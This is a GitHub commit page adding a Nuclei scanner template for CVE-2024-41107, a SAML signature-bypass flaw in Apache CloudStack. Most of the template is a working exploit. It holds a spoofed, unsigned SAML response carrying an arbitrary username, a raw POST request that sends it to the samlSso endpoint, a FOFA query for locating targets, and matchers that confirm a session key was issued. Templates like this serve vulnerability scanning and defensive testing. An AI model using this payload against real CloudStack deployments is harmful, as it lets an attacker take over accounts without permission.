Skip to content

Commit

Permalink
Merge pull request #10421 from projectdiscovery/CVE-2024-41107
Browse files Browse the repository at this point in the history 
Create CVE-2024-41107.yaml
  • Loading branch information
@pussycat0x
pussycat0x authored Aug 1, 2024
2 parents 4227f2f + 8164e97 commit bbc1b23
Showing 1 changed file with 46 additions and 0 deletions.
46 changes: 46 additions & 0 deletions http/cves/2024/CVE-2024-41107.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,46 @@
id: CVE-2024-41107

info:
name: Apache CloudStack - SAML Signature Exclusion
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
The CloudStack SAML authentication (disabled by default) does not enforce signature check. In CloudStack environments where SAML authentication is enabled, an attacker that initiates CloudStack SAML single sign-on authentication can bypass SAML authentication by submitting a spoofed SAML response with no signature and known or guessed username and other user details of a SAML-enabled CloudStack user-account
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-41107
- http://www.openwall.com/lists/oss-security/2024/07/19/1
- http://www.openwall.com/lists/oss-security/2024/07/19/2
- https://cloudstack.apache.org/blog/security-release-advisory-cve-2024-41107
- https://github.com/apache/cloudstack/issues/4519
classification:
epss-score: 0.00046
epss-percentile: 0.16798
metadata:
verified: true
max-request: 1
fofa-query: app="APACHE-CloudStack"
tags: cve,cve2024,apache,cloudstack,auth-bypass

variables:
username: "{{username}}"
entityid: "{{entityid}}"
saml_id: "{{saml_id}}"
saml: '<?xml version="1.0" encoding="UTF-8"?><samlp:Response Destination="{{RootURL}}/client/api?command=samlSso" ID="_b0389fca0ea65fe8e857" InResponseTo="{{saml_id}}" IssueInstant="2024-07-30T10:48:20.307Z" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <samlp:Status xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success" /> </samlp:Status> <saml:Assertion ID="_7a2993514112bbc72696" IssueInstant="2024-07-30T10:58:20.307Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns:xs="http://www.w3.org/2001/XMLSchema"> <saml:Issuer Format="urn:oasis:names:tc:SAML:2.0:nameid-format:entity" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{{entityid}}</saml:Issuer> <saml:Conditions NotBefore="2024-07-30T10:43:20.307Z" NotOnOrAfter="2024-07-30T10:53:20.307Z" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:AudienceRestriction> <saml:Audience>org.apache.cloudstack</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2024-07-30T10:48:20.307Z" SessionIndex="{{saml_id}" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:AuthnContext> <saml:AuthnContextClassRef> urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Attribute Name="uid" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified"> <saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">{{username}}</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion></samlp:Response>'

http:
- raw:
- |
POST /client/api?command=samlSso HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
RelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(header,'sessionkey')"
- "contains(content_type,'text/xml')"
- "status_code==302"
condition: and

0 comments on commit bbc1b23

Please sign in to comment.